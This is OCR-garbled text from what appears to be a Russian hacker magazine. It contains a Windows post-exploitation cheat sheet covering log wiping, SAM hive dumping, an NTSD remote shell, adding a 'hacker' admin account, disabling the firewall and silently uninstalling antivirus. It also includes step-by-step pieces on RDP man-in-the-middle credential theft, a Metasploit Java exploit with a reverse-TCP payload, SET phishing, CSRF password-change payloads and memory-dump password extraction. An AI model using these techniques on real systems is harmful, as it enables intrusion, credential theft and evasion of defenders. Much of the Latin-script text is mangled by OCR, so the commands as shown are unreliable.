Имей в виду, что использовать команду может только администратор. 

Отображает все запланированные задачи, которые доступны пользователю для просмотра. В отличие от аі, с помощью 
зсЫазкз запланировать запуск приложения может любой пользователь (необязательно админ). 

Отображает все запущенные сервисы 



зс деікеупате "ХХХХХ" 
зс диегуех "ХХХХХ" 



Первая команда позволяет получить кеу пате интересующего тебя сервиса. После его получения ты можешь 
запросить статус, РЮ и другую информацию о сервисе с помощью второй команды. 



Іазкіізі (ХР+) 

ІазккіІІ [/(] /рісі <рісІ> 

ІазккіІІ [/П /іт <ітаде_пате> 

ізиііі ізіпіо сігіѵез 

дргезиіі /г 



Еще одна команда для отображения списка процессов. 



Убивает процесс по имени или РЮ 



Отображает текущие диски в системе (для использования нужны права администратора). 
Выводит по-настоящему большой отчет о групповых политиках. 



РАБОТА 
СЛОГАМИ 



т 



В любой системе пишутся логи. Вернее, множество логов. Ниже приведена небольшая подборка команд, с помощью 
которых ты сможешь посмотреть нужные тебе журналы или при необходимости удалить их. 



ѵѵеѵіиііі еі 

ѵѵеѵіиііі де <1_©дМате> 
ѵѵеѵіиііі сі <І_одІМате> 
сіеі %ѴѴШОІК%\*.Іод /а /з /д И 



Выводит список всех логов, над которыми далее можно выполнить некоторые операции (просмотреть, удалить и т. д.). 
Получение конкретного лога. 

Удаляет указанный лог. 

Брутальный способ удаления всех логов из папки ѴѴІЫ00ѴѴ5. 
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УДАЛЕННЫЙ 
ДОСТУП 



Стандартные средства ѴѴіпсІоѵѵз не очень-то позволяют подключаться к удален- 
ным хостам по различным протоколам и принимать подключения. Но кое-что 
с их помощью все-таки можно предпринять. 



Команда 



Описание 



%ѵѵіпгііг%\5узІет32\стс1.ехе /с 
"%5у5ІетКооІ%\зу5Іет32\0І5т. 
ехе" /опііпе /деЫеаІигез 

%ѵѵіпс1іг%\Бу5Іет32\стс1.ехе /с 
м %5у5ІетВооІ%\5у5Іет32\0І5т. 
ехе" /опііпе /епаЫе-^еаІиге / 
*еаІигепате:ТРТР 



Эту команду можно выполнить, только если у тебя есть права админа, но зато она позволяет включить многие опции 
ѴѴіпсІоѵѵз Ѵізіа 5Р1/7/2008/2008Р2, которые по умолчанию отключены, например Іеіпеі или Ир-клиент.. 



В приведенном примере эта команда включает ТРТР. Это позволит тебе использовать консольный РТР-клиент Шр.ехе 
для загрузки файлов в систему. 



N15(1 -зегѵег Іср:рогІ=1337 саі.ехе 
ЫІзсІ -гетоіе 1ср:зегѵег=<ір- 
адрес>,рогІ=1337 



пеі изе 



Любая версия ОС ѴѴіпсІоѵѵз младше Ѵізіа по умолчанию включает отладчик пізсі.ехе, который находится в папке 
5у5Іет32. Он предоставляет отличную возможность открыть на системе шелл. Для этого нужно активировать 
удаленную отладку (первая команда), подключившись к какому-нибудь процессу. После этого к системе сможет 
подключиться удаленный отладчик (вторая команда). Если после подключения он введет команду «.зЬеМ», то 
получит доступ к командной строке. Этот трюк называется ЫТ50 ВасЫоог. 

Подключает удаленные сетевые шары. 





РАБОТА 
С РЕЕСТРОМ 



Реестр системы — настоящий кладезь информации, проанализировать которую 
бывает очень полезно. Тут нет особых премудростей: через консоль ты можешь 
сохранить некоторые ветки из реестра, сделать выборку или, допустим, доба- 
вить новый ключ (например, чтобы добавить новое приложение в автозапуск). 



гед заѵе НКІ_М\5есигіІу зесигііу. 
Ніѵе 

гед заѵе НКІ_М\5АМ зат.Иіѵе 

гед асісі [\\ТагдеІІРасІсІг\] [КедОо- 
таіп][ \Кеу ] 

гед ехрогі [РедОотаіп]\[Кеу] 
[РіІеІМате] 

гед ітрогі [РіІеІМате ] 

гед чиегу [\\ТагдеІІ РасІсІг\] [Вед- 
ОотаіпШ Кеу ] /ѵ [Ѵаіиепате!] 



Команда сохраняет ветку зесигііу в файле. Аналогично можно, к примеру, сохранить ветку зузіет. 

В файле можно сохранить и ВАМ, но для этого нужны права администратора. 

С помощью этой команды можно добавить в реестр нужный ключ (в том числе на удаленной машине ТагдеІІРасІсІг). 
Например, «КЕС АЭй НК1_М\5о-Р1:маге\МуСо /ѵ ОаХа /X КЕС_ВІІ\ІАКѴ /сі -Ре340еасІ» добавит параметр (имя: Оаіа, 
тип: РЕ6_ВІЫАРУ, данные: 1е340еас1). 

Выполняет простой экспорт данных из реестра. 

Импортирует данные в реестр. 

Выполняет поиск по реестру. 




ПОИСК ПОЛЕЗНЫХ 
ФАЙЛОВ 



Банальный поиск файлов по диску, казалось бы, элементарная задача. Но как 
ты будешь искать, скажем, на диске С: файл с названием 5ат_Ьаскир.сІаі? Если 
ты знаешь, как это делается, — молодец, переходи к следующему разделу. 

А мы пока приведем пару полезных сниппетов: 




Ігее С:\ Л /а > С:\оиІриІ_оМгее.ІхІ Выводит список всех директорий и файлов диска С: в древовидном виде, записывая их в файл. 



сіігХ/з/Ь I НпсІ /I "зеагсІі_5Ігіпд" 



Ищет по выводу команды сііг из корня текущего диска (\) и по всем поддиректориям (/з) с использованием формата 
базе (/Ь) строку 5еагсЬ_з1гіпд, которая может встретиться где угодно в файле и в пути к файлу. 
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Пра 



вила постэксплуатации 



ИГРЫ 

СѴѴМІС 



Пользователь, имеющий доступ к консоли, может прибегнуть к еще одному мощному 
инструменту — ѴѴМІ (ѴѴіпсІоѵѵз Мападетепі Іпіегіасе). Помимо довольно навороченных 
скриптов, можно активно использовать ѴѴМІ-консоль (ѴѴМІС): ниже приведено не- 
сколько довольно простых примеров, иллюстрирующих, чем она может быть полезна. 



Команда 



ѵѵтіс ЬазеЬоагсІ деі Мапиіасіигег, МосіеІ, Ргосіисі, 
БегіаШитЬег, Ѵегзіоп 



С помощью ѴѴМІ мы можем составлять различные запросы для получения информации о различных 
объектах системы. К примеру, мы можем попросить ѴѴМІ-объект (сотриіегзузіет, или Ьіоб, или, как 
в данном примере, ЬазеЬоагсІ) вернуть значение некоторых его параметров. Вывод оформляется 
в удобном для чтения формате. Команда в примере возвращает данные о материнской плате. 



ѵѵтіс піссопЛд деі сарііоп, тасагісігезз, ірасісі гезз, 
ОеІаиІІІРбаІеѵѵау 



Извлечение информации о сетевых адаптерах: названия, МАС-адреса, ІР-адреса, заданного 
по умолчанию шлюза. 



ѵѵтіс піссопНд ѵѵЬеге "ІРЕпаЫесІ = 'ТРІІЕ' апсі 
ОЫБОотаіп ІБ N01 N1111" деі ОеІаиІІІРѲаІеѵѵау, 
ОНСРБегѵег, ^N5^отаіп, ОМБНозШате, □N5- 
БегѵегБеагсЬОгсІег, ІРАсІсІгезз, ІРБиЬпеІ, МАСАсІ- 
сігезз, ѴѴШБЕпаЫеІ-МНозІзІ-оокир, ѴѴШБРгітагу- 
Бегѵег, ѴѴШББесопсІагуБегѵег /ІогтаЫізІ 



Подробная информация об активных сетевых адаптерах. 



ѵѵтіс ргіпіег деі Сарііоп, ОеіаиІІ, йігесі, Оезсгір- 
Ііоп, ЬосаІ, БЬагесІ, БЬагепате, Біаіиз 



Получение списка принтеров с их параметрами, в том числе сетевыми именами. 



ѵѵтіс оз деі Ьооісіеѵісе, сарііоп, сзпате, сиггепі- 
Іітегопе, іпзІаІИаІе, зегѵісерасктаіогѵегзіоп, 
зегѵісерасктіпогѵегзіоп, зузіетсігіѵе, ѵегзіоп, 
ѵѵіпсіоѵѵзсіігесіогу /Іогтаігіізі 



Извлечение информации о системе. 



ѵѵтіс ргосіисі деі Сарііоп, ІпзІаІЮаІе, Ѵепсіог 



Извлечение списка установленных программ. 



ѵѵтіс раІН ѵѵіп32_ргос!исІ ѵѵМеге "пате = 'НР БоЙ- 
ѵѵаге Іірсіаіе'" саІІ ІІпіпзІаІ 



Удаление программы НР Бо^ѵѵаге Іірсіаіе. 




АКТИВНОЕ 
ВОЗДЕЙСТВИЕ 
НА СИСТЕМУ 



Приведенные ниже команды производит активное воздействие на систему и меняют ее 
параметры, поэтому факт их использования в некоторых случаях можно легко отследить. 
Однако без них часто попросту не обойтись. 



пеі изег Иаскег Маскег /асісі 

пеі Іосаідгоир асітіпізігаіогз /асісі Иаскег или 
пеі Іосаідгоир асітіпізігаіогз Ьаскег /асісі 

пеі зМаге поІИіпд$=С:\ /дгапІ:Ііаскег,РШ_І_ /ипііт- 
ііесі 

пеі изег изегпате /ас1іѵе:уез /сіотаіп 

пеізіі ІігеѵѵаІІ зеі ортосіе сІізаЫе 

ѵѵтіс ргосіисі деі пате /ѵаіие 

ѵѵтіс ргосіисі ѵѵііеге пате="ХХХ" саІІ ипіпзіаіі / 

поіпіегасііѵе 



Создает нового локального пользователем с именем Ьаскег и таким же паролем. 
Добавляет пользователя Ьаскег в группу локальных админов. 



Расшаривает диск С: и предоставляет пользователю Ьаскег полные права доступа. 

Если какие-то пользователи заблокированы (к примеру, старые акки администраторов домена), 
то их можно разблокировать. 

Отключает стандартный файервол ѴѴіпсІоѵѵ5. 

Первая команда позволяет получить список установленного софта, а вторая — незаметно удалить 
нужную программу (например, антивирус). 



гипсіІІ32.ехе изег32.сіІІ, І_оскѴѴогк51аІіоп 



Блокирует (лочит) экран пользователя. 
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ВЗЛОМ/ ЕА5ѴНАСК 



Алексей «бгеепйод» Тюрин, ОідііаІ Бесигііу (іѵѵіНег.сот/апІуигіп) 




ПОЛУЧИТЬ АДМИНСКУЮ УЧЕТКУ ЧЕРЕЗ МІТМ НА ВРР 



ЗАДАЧА 



РЕШЕНИЕ 

Давай рассмотрим вполне обыденную для какой-нибудь компании 
ситуацию. Есть толпа обычных доменных пользователей, есть некие 
админы и техподдержка. Последняя, понятное дело, обладает уже 
привилегированными правами, поэтому нас и интересуютучётки 
суппорта. Что мы можем сделать? 

Существует чудесный протокол РйР, который позволяет получить 
доступ к удаленному рабочему столу хоста. Этот протокол как раз 
и используют для удалённого администрирования винды. Ведь это 
чрезвычайно удобно: «из коробки» работает привязка к учеткам 
в домене, а серверная часть предустановлена во всех версиях 
ѴѴіпсіоѵѵб, начиная с ХР и 2000 (и даже с ещё более ранних). Вообще, 
протокол достаточно хорошо защищен — здесь и шифрование, и 
возможность применения ТІ_5. Но не все так хорошо, как может по- 
казаться на первый взгляд, что нам только на руку. Протокол млад- 
ше 6-й версии уязвим к атаке тап-іп-іЬе-тісІсІІе (МІТМ), благодаря 
чему мы можем расшифровывать данные, которыми обмениваются 
сервер и клиент, в том числе логин и пароль. С учётом того, что ХР 
все ещё широко используются как клиентские ОС, то мы запросто 
можем похитить учётку админа. По сути, труднее всего здесь будет 
«заставить» админчика подключится по РОР. Но если мы проведём 
МІТМ на клиентскую тачку, помучаем её, отключая, например, до- 
ступ в Сеть, то её пользователь в скором времени позвонит в техпод- 
держку и попроситудалённой помощи, что нам и нужно :). 

Для лучшего понимания давай рассмотрим сам алгоритм МіТМ- 
атаки на протокол РОР младше 6-й версии: 

0) Производится АРР- или 0М5-спуфинг.Таким образом, мы «ви- 
дим» весь трафик между клиентом и сервером. 

1) Клиентподключается ксерверу. 

2 ) Сервер посылает в ответ свой открытый ключ с ран домны м 
заІСом. Подменяем ключ на поддельный. 

3) Клиентотвечаетрандомом, зашифрованным поддельным откры- 
тым ключом. 

4) Мы расшифровываем рандом нашим поддельным закрытым 
ключом и криптуем его настоящим серверным. 



5 ) Трафик расшифровывается на основании полученных да иных (он 
зашифрован симметричным РС4). 

Вообще, это первоначальный вид МіТМ-атаки. Был выпущен патч, 
который позволил клиенту осуществлять проверку открытого ключа 
сервера. Проверка выполнялась за счеттого, что сервер пере- 
давал клиенту ещё и Мйб-хеш открытого ключа, зашифрованного 
закрытым ключом (т. е. подписи), но в ее реализации был косяк. 

Для подписи использовался захардкоженный в ОС закрытый ключ, 
то есть подделать подпись не составляло труда. Зачем так было 
сделано, непонятно. 

Для заинтересовавшихся рекомендую статью по теме ( доо. 
д1/7ѵАРѵ ). В итоге на РОР можно провести МІТМ, проснифать тра- 
фик без появления всяких окошек с предупреждениями об опас- 
ности. Всё это и реализовано в чудо-тулзе Саіп&АЬеІ ( ѵѵѵѵѵѵ.охісі ): 

1) ВовкладкеЗпііТегзапускаемЗсап МАС асісігевв. 

2 ) Далее открываем вкладку АРР и выбираем АРР в дереве слева. 

3) Кликаем на плюсикдля добавления всписок. 

4 ) Выбираем в списке наши жертвы: слева указываем сервер, справа 
— клиенты, в том числе в виде диапазона. 

5 ) Запускаем снифер и агр-роізопіпд. 

Далее остаётся только ждать. В случае успешной МіТМ-атаки в вет- 
ке АРР-РйР появятся записи о файлах дампов РОР-трафика. Если 
этого не произошло, значит, либо не было подключений, либо ис- 
пользовался протокол версии 6 или выше. Но что делать с дампом? 
Просматривая его, мы не найдем логин и пароль в виде отдельной 
строчки. В данном случае в дампе хранится то, что пользователь 
ввел с клавиатуры. А потому, чтобы не рыться самому, можно вос- 
пользоваться мини-утилитой от Ігопдеек'а ( доо.дІ/ЕтЬхв ). Запустив 
её и выбрав дамп расшифрованного РОР-трафика, на выходе мы 
получим то, что вводил клиент. Имеется соответствующая видеоде- 
монстрация ( доо.д1/рѵсІМ2 ). Проблема серьезная, особенно с учётом 
того, что на 2003 винде серверная часть поддерживает РРР 5.0. 
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ЕА5У НАСК 



АТАКОВАТЬ ПОЛЬЗОВАТЕЛЯ С ПОМОЩЬЮ МѴА 



ЗАДАЧА 



РЕШЕНИЕ 

Браузер и его плагины, в том числе Заѵа, являются одними из основ- 
ных объектов атак, направленных на пользователя. Конечно, Заѵа 
не так распространена, как ЕІазЬ, но зато реже обновляется, чем и 
пользуются плохие парни. Как может выглядеть атака? Для начала 
необходимо определить, какая версия Заѵа установлена у пользова- 
теля, и выбрать соответствующий эксплойт. На сайте )аѵа*е5Іег.огд/ 
ѵегзіоп.МтІ есть пара хороших вариантов. Дальше нужно включить 
социальную инженерию и задействовать любые другие способы, 
чтобы переадресовать пользователя на заранее сформированную 
страницу. Какие эксплоиты обычно пускают в ход? Например, можно 
взять не особо палевный хорошенький сплоит куязвимости-фиче 
СѴЕ-201 0-4452, о котором нетак давно писал наш журнал. Атака реа- 
лизуется хакерами очень просто, так как сплоит есть в МеІазрІоіЕе: 

1) Выбирается сплойт: 

изе ехр1оі1:/ыіпсІо\л/5/Ьгоы5еп/заѵа_сосІеЬаБе_1:пи5І: 

2) Указывается путь к нему и порт: 

зеѣ ІШРАТН Тез^.ріір 
зеТ І_РОКТ 80 

3) Указывается нагрузка: 

Бе* рауіоасі даѵа/теТегргеТег/геѵегзе-Тср 

4) Выполняется запуск: 

ЕхрІоіТ 

Вот и явавская версия Меіегргеіег пригодилась :). Но что де- 
лать, если версия Заѵа пропатчена? Можно воспользоваться 
универсальным эксплойтом. У него есть один косяк: пользо- 



вателю выдается предупреждение о том, что будет запущено 
Заѵа-приложение. Однако его огромное преимущество состоит 
в том, что он не использует никакие нагрузки, а также загружа- 
ет на машину пользователя любой экзешник и запускает его, 
что значительно расширяет наши возможности в некоторых 
ситуациях. Что делать с предупреждением? Ничего! :) В данном 
случае нам поможет либо ЗаѵаБсгірС который будет приставать 
к юзеру с просьбой о запуске Заѵа-апплета, либо социальная 
инженерия. Кстати, существует интересная статистика, касаю- 
щаяся социальной инженерии и практического применения этого 
модуля ( сіекоп-гиззіа.ги/ѵѵаі 1.1x1 ). Проще всего воспользоваться 
этим эксплойтом с помощью тулкита 5ЕТ (БосіаІ Епдіпеег Тооікіі]. 
Он входит в комплект ВаскТгаск 5 и доступен для загрузки на 
официальном сайте (ѵѵѵѵѵѵ.зосіаі-епдіпеег.огд). 5ЕТ автоматически 
создает фишинговый сайт, и в этом его главный бонус. Запускаем 
5ЕТ и последовательно выбираем: 

1) ѴѴеЬзіІе АиаскѴесІогз; 

2) Тбе Заѵа Арріеі АМаск МеіЬосІ; 

3) ѴѴеЬТетрІаІездля использования существующего шаблона (или 
ЗіІеСІопег для автоматического создания клона сайта); 

4) ОтаіІ для создания клона почты (ЗтаіІ; 

4) Ітрогіуоигоѵѵп ехесиІаЫе, чтобы использоватьсобственный ехе- 
файл. 

В конце вписывается путь к ехе-файлу. Все, теперь злоумышленнику 
остается только заманить клиента на сайт и подождать, пока он со- 
гласится на запуск Заѵа. 



ОРГАНИЗОВАТЬ ДОСТУП В ИНТЕРНЕТ В ОБХОД ПРОКСИ 



ЗАДАЧА 



РЕШЕНИЕ 

Что, закрыли доступ к ВКонтакте на работе? Что делать? 
Паниковать? Менять работу? :) Можно использовать зеркала, 
но админчики тоже достаточно быстро их прикрывают, ведь на- 
чальство сказало, что народ не должен бездельничать, засижи- 
ваясь в соцсетях. Конечно, можно подружиться и договориться 
с админами (и это самый лучший выход :)), но можно и пойти 
обходным путем. Например, если исходящий трафик из корпора- 
тивки не фильтруется по каким-то портам и протоколам, то это 
можно использовать. Рассмотрим распространённый случай: 
пусть для пользователей разрешён доступ по 5МТР (25/ТС Р) 
для того, чтобы они могли читать свою почту с бтаіі или МаіІ.ги. 
Как, я думаю, уже ясно, чтобы обойти прокси, нам потребуется, 
по сути, поднять свой прокси на каком-нибудь сервере в инете 
и прописать его в браузере. Где взять сервер? Можно купить 
виртуальный сервер за 150 рублей в месяц. Но ещё лучше, если 
дома ты выходишь в Сеть с внешнего ІР. В качестве прокси можно 
взять Зргоху ( ѵѵѵѵѵѵ.Зргоху.ги ). который одновременно и прост, и 
функционален. К тому же его разработал знаменитый олдскуль- 
ный хакер ЗАРАЗА. Помнится, я ходил на его сайт зесигііѵ.ппоѵ.ги 
лет десять назад, и мне всегда хотелось поблагодарить его за 
хороший ресурс, что я сейчас и делаю, пользуясь служебным 
положением. :) Для практической реализации нам потребуется 
скачать либо исходники (для *н иксов), либо экзешнички (для 
винды) и запустить проксик на необходимом порте с помощью 
следующей команды: 



Прописываем прокси-сервер в браузере и радуемся интернету. 
Конечно, для лучшей юзабельности стоит прописать этот прокси 
как сервис и ввести аутентификацию. И то и другое легко реали- 
зовать через конфиг-файл Зргоху. Как определить, заблокирован 
ли исходящий трафик из корпоративки? В простейшем случае это 
известно пользователям (как в случаях с внешней почтой). Также 
можно проверить, заблокирован ли трафик, подключившись с по- 
мощью браузера без прокси к каким-нибудь портам хостов в Сети 
(типа ѵѵѵѵѵѵ.ехатрІе.сот:25). Если порт доступен, то мы получим 
приветственное сообщение сервиса. Конечно, сканер типа птар 
позволяет добиться более точных результатов. Тогда можно будет 
попробовать и другие протоколы, типа ІЮР и ІСМР, и всякие махи- 
нации с ТСР, например ТСР-АСК. По идее, при большей свободе ма- 
нипуляций можно добиться инкапсуляции почти любого необходи- 
мого трафика в допустимый исходящий трафик из корпоративной 
сети и организовать таким образом канал связи. 






ы 
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ВЗЛОМ/ ЕА5ѴНАСК 



ВЫЯВИТЬ ИСПОЛЬЗОВАНИЕ КЕѴЕК5Е-ПР0КСИ 



ЗАДАЧА 



РЕШЕНИЕ 

Продолжая начатую тему прокси, хочу рассказать тебе о геѵегзе- 
прокси. Что это такое? Это некий сервер, который выдаёт себя за 
веб-сервер, хотя на самом деле только передаёт запросы (прокси- 
рует] от клиента настоящему веб-серверу и отсылает его ответы 
клиенту. Зачем это нужно? Цели могут быть разные. Например, 
геѵегзе-прокси можно использовать для распределения нагрузки 
между несколькими внутренними веб-серверами, в качестве ѴѴАР 
или специализированного 55І_-сервера, обеспечивающего до- 
полнительный уровень защиты, или кэширующего прокси (думаю, 
его назначение ясно без дополнительного объяснения). Возмож- 
ны и комбинированные варианты. В любом случае присутствие 
проксиков чаще всего стараются скрыть, а сами прокси призваны 
скрывать внутреннюю структуру системы (действительно, зачем о 
ней знать кому-то «снаружи»?). Как раз раскрытием и того и друго- 
го мы сейчас и займёмся. 

Выявить геѵегзе-проки и узнать внутреннюю структуру всей 
систему в целом — интересная задача. Но как же ее решить? Ведь 
прокси просто передает полученный от клиента запрос дальше на 
веб-сервер. Проще всего в данном случае просматривать заголов- 
ки ответов от сервера. Например, в них может содержаться заголо- 
вок X- Рогѵѵа гсіесі- Рог, по которому часто можно распознать наличие 
прокси, но этого маловато! На самом деле, протокол НТТР — вещь 
мощная, и многие не в курсе его маленьких приятных особенно- 
стей. Поэтому давай присмотримся к наработке француза Николаса 
Грегуара ( доо.дІ/ѴОЬеѴѴ ). В стандарте для протокола НТТР, а точнее 
в РРС 2616 для версии 1.1, говорится о таком поле заголовка, как 
Мах Рогѵѵагсіз. Это поле, которое хранит в себе цифровое значе- 
ние, используют как минимум методы ТРАСЕ и ОРТІОЫЗ. При его 
наличии каждый гейт и прокси-сервер должны отнимать единицу 
перед передачей данных следующему получателю. Если отнять 




Результат работы НТТР-ІгасегоиІе. 5диіс1 в качестве 
геѵегве-прокси у ѴѴікіресііа.огд 




Что такое геѵегзе ргоху 



уже ничего нельзя, а точнее если значение получилось равным 
нулю, то этот сервер должен ответить так, как будто он конечный 
получатель. Для других методов, типа СЕТ и Р05Т, обработка этого 
поля не обязательна. По сути, это аналог поля ТТІ_ в ІР-протоколе. 
РІиколас не обломался состряпать тулзу, отправляющую запросы 
веб-серверу и анализирующую ответы, то есть в некотором роде 
НТТР-аналог Ігасегоиіе. Даже с учётом того, что ТРАСЕ-метод 
часто запрещено использовать для обработки на веб-серверах, а 
другие методы не регламентированы РРС, на практике метод СЕТ 
хорошо обрабатывает поле МахРогѵѵагсІз. В отличие от Ігасегоиіе, 
мы можем получить гораздо больше полезной информации, к при- 
меру внутренние ІР-адреса проксиков и их версии. Использовать 
тулзу очень просто: 

НТТР-ТгасегоиІіе. ру -1: млм. ѵісЕіт. сот -т метод (ТКАСЕ/ 
6ЕТ/Р05~П 



СДЕЛАТЬ ЧТО-НИБУДЬ С ПОМОЩЬЮ С5КР 



ЗАДАЧА 



РЕШЕНИЕ 

В связи с просветительской деятельностью журнала не могу не кос- 
нуться такой интересной темы, как С5РР (Сгозз 5і1е Рециезі Рогдегу, 
Подделка межсайтовых запросов). Это вид атаки, направленный на 
посетителей веб-сайтов. Если жертва заходит на сайт, созданный 
злоумышленником, от её лица тайно отправляется запрос на другой 
сервер (например, на сервер платёжной системы), осуществляющий 
некую вредоносную операцию (например, перевод денег на счёт 
злоумышленника). Интересно, что атака осуществляется на пользо- 
вателей системы, тогда как защита организуется на стороне сервера, 
то есть о ней частенько забывают, а потому и встречается такая атака 
нередко. Как ни странно, из браузера можно отправить можно почти 
любой запрос, особенно если доступен ЭаѵаВсгірІ. Предположим, что 
мы хотим захватить аккаунт какого-нибудь юзера на каком-нибудь 
сайте. На этом сайте есть скрипт для смены пароля пользователем. 
Для смены требуется отправить ОЕТ-запрос следующего вида: Мир:// 
зегѵег.сот/сЬапде_раз5ѵѵогсІ.рЬр?МР=пеѵѵ_ра55, где пеѵѵ_разз — 
пароль, который мы поставим нашей жертве. Итак, от нас требуется 
только создать НТМПку и вписать в неё следующий код: 

<і-Ргате згс= ІгІ:1:р://5егѵеп.сот/сІіап§е_ра55ыопсІ.рІір?МР= 
пеы_разз></і-Ргате> 

Злоумышленник заставляет жертву посетить сайт, в результате 



чего получает возможность войти на него под ее аккаунтом с изме- 
ненным паролем. Но ЗЕТ-запрос — это слишком просто. Что делать, 
если для изменения пароля используется метод Р05Т? В таком 
случае создаем следующий код: 

<-Рогт пате=ра55мсІ ас1:іоп= 

"Іі1:1:р://5епѵеп. сот/сІіап§е_ра55ыогсІ. рбр" те1:МосІ= " розі: " > 
<іпри1: 1:уре=МісІсІеп пате= ИР ѵа1ие= пеы_ра55 > 

<іпри1: 1:уре= ,, 5иЬті1: ,, > 

</-Рогт> 

<5сгір1:>сІосиі , пеп1:. разБысІ. БиЬтіІіО ;</5сгір1і> 

Хорошо! А что если изменения вносятся в результате ХМІ_- 
запроса? Нет проблем — отправляем ХМЬзапрос. :) 

<-Ронп пате=ра55іл/сІ ЕІМСТУРЕ="1:ех1:/р1а:і.п" 
асЕіоп="Ітир: //зегѵег. сош/сІіап§е_ра55ыогсІ. рбр" 
МЕТН00="Р05Т"> 

<іпри1: 1:уре=МісІсІеп пате='<?хт1 ѵегзіоп' 

ѵаІие^'І.Ѳ" ?><ІІ5егхРа55ыопсІ>пеы_ра55</Ра55ыогсІ></ІІ5ег> ' > 
</-Рогт> 

<5сгір1:>сІоситеп1:. раззысі. БиЬтіІіП ;</5сгір1:> 

Идея, думаю, ясна. Отправить можно что угодно куда угодно ;). 
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ЕА5Ѵ НАСК 



ПРОАНАЛИЗИРОВАТЬ ДАМП ПАМЯТИ 



ЗАДАЧА 



РЕШЕНИЕ 

Компьютерная криминалистика (или, как ее еще называют, бідііаі 
іогепзісз) — нужное и важное направление, которое сейчас стало 
особенно модным. В операционной системе имеется множество 
компонентов, которые хранят доказательства и следы взлома или 
преступления, — это вообще очень обширная тема для исследо- 
вания. Сегодня мы расскажем об одном из таких компонентов и 
рассмотрим, что можно извлечь из оперативной памяти: 

• список запущенных процессов; 

• список открытых сетевых сокетов; 

• список открытых сетевых соединений; 

• перечень всех йИ-библиотек для каждого процесса; 

• список открытых файлов для каждого процесса; 

• список используемых ключей реестра для каждого процесса; 

• список модулей ядра ОС; 

• информация о ѴігіиаІ Асісігезз Оезсгіріог; 

• адресное пространство для каждого процесса; 

• ит.д. 

Короче говоря, в памяти содержится много интересной и полез- 
ной информации, но, чтобы извлечь и проанализировать ее, нам 
потребуются некоторые инструменты. Позволь сразу познакомить 
тебя с фреймворком для анализа дампов памяти Ѵоіаіііііу ( доо.ді/ 
Нібір ). Фреймворк написан на РуіЬоп'е и поддерживает все версии 
ОС ѴѴіпсІоѵѵз (начиная с ХР), правда, только 32-битные. Возмож- 
ности модулей, которые входят в состав фреймворка, покрывают 
все основные потребности компьютерного криминалиста. Я при- 
веду лишь несколько примеров, которые могут быть полезны для 
пентестерских дел. 

Прежде чем приступать к анализу дампа памяти (то есть файла 
с ее содержимым), давай разберемся с тем, где этот самый дамп 
взять. Вариантов туттьма тьмущая, но если память необходимо 
сдампить максимально быстро и незаметно, советую тебе вос- 
пользоваться утилитой МоопЗоІз Оштріі ( Ьіір://доо.д1/ВУ1СіІ\І ). Эта 
мини-тулза имеет только одну функцию: делает дамп памяти и 
сохраняет ее содержимое в файле «рядом с собой». Создатели со- 
ветуют кинуть утилиту на флешку. Все, что потребуется дальше, — 
это минута админского доступа в ОС (еще лучше, если атакуемый 
компьютер поддерживает автозапуск с 115В). 

Хорошо, дамп есть — что дальше? Теперь дело за Ѵоіаіііііу. 
Кстати, чтобы не возиться с РуіЬоп'ом, рекомендую скачать от- 
дельные зіапсіаіопе-экзешники, в которые все уже включено. Для 
начала посмотрим, что за дамп мы имеем: 

ѵоіаіііііііу . ехе іта§еіітРо -Т сНХііезІі.гам 




Дамп памяти в два клика 




Виндовые учётки из дампа памяти 

Здесь: 

• ітадеіпіо — выбранный модуль фреймворка; 

• і сіАіезі.гаѵѵ — путь к файлу с дампом. 

Ѵоіаіііііу выдает набор какой-то непонятной информации. ;) 
Отсюда мы возьмём только имя профиля (ѴѴіпХР5РЗх86), который 
будем использовать далее. Итак, какую информацию добыть? 
Простейший пример — извлечение из дампа списка запущенных 
процессов: 

ѵоіаіііііііѵ рзіізіі -Т сі : \1=е5І= . гам --рпоб1е=1лІіпХР5РЗх86 

Или, например, списка сетевых подключений: 

ѵоіаіііііііу пеііБсап --Р сІ:\1іе5Іі.гаы --рпоб1е=ЫіпХР5РЗх8б 

А что если посмотреть что-то более интересное и, например, 
получить учётки, которые хранятся в 5АМ, или ещё какую-нить 
любопытную информацию из І_5А? Для этого нам потребуется 
организовать доступ к реестру ѴѴіпсІоѵѵз нашего дампа. 

ѵоіаіііііііу іііѵеіізіі --Р сі : Хііезіі . гам -~ргоб1е=ЫіпХР5РЗх8б 

Здесь Ьіѵеіізі — модуль для вывода информации реестра, а 
точнее путей и виртуальных адресов тех или иных веток реестра. 
Используя полученную информацию, запускаем следующий 
модуль: 

ѵоіаіііііііу Ііазіісіитр --Р сі : Хііезіі . гам --ргоб1е=1лІіпХР5РЗх86 
-у ѲхеІѲЗБЬбѲ -5 Ѳхе18Ѳ5ЬбѲ 

Здесь: 

• ЬазЬсІитр — модуль для вытаскивания данных об учётках; 

• у ОхеЮЗбЬбО — виртуальный адрес куста Зузіет; 

• з Охеі 805660 — виртуальный адрес куста 5АМ. 

Как видишь, всё просто и быстро. Кроме того, фреймворк также 
понимает файлы крэшдампов и гибернации. Но возможностей, 
как я писал, ещё больше. Так что посмотри вики на сайте Ѵоіаіііііу. 
Чтобы быстро получить список всех модулей, которые входят в 
фреймворк, а также их описания достаточно запустить приложе- 
ние без параметров. 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



Павел Александрович (іѵіпзісІе.ЫодзроСсот) 
Дмитрий Михайлович (115612, дер. Красная звездочка, д.1) 




Обзор 

эксплоитов 

В конце октября-начале ноября появилось 
достаточно много новых интересных продуктов 
индустрии эксплоитостроения. Ксожалению, 
рассказать обо всех достижениях современной 
науки и техники в рамках этого обзора не пред- 
ставляется возможным, поэтому мы, следуя 
студенческой пословице «Лучше пи на три в 
рукаве, чем неопределенный интеграл в небе», 
отобрали наиболее выделяющиеся сплоиты. 



Переполнение буфера в Місгоеой (Шісе 2007 
1 ЕхсеІ.хІЬ 



СѴ55Ѵ2 9.3 



(АѴ:Ы/АС:М/АІІ:І\І/С:С/І:С/А:С) 

1 

Дата релиза:5 ноября 2011 года. 

Автор: Апіѵѵау, аЬузззес, зіппЗгл'иап ѵагриег. 

СѴЕ: СѴЕ-20 1 1-0105. 

В начале ноября в Сети появился эксплоит для уязвимости, которая 
проявляется при обработке специальным образом созданного хІЬ- 
файла ЕхсеІ. В результате использования этойуязвимости атакую- 
щий получает ни много ни мало полный контроль над удален ной 
системой. 



ЕХРЮІТ 



ЕхсеІ позволяет создавать и настраивать панели для более удоб- 
ного и эффективного использования различных инструментов, 
причем эти панели можно сохранять для повторного использо- 
вания (например, на другом компьютере). Обычно такие панели 
инструментов имеют расширение хІЬ. Формат файла эксплоита 
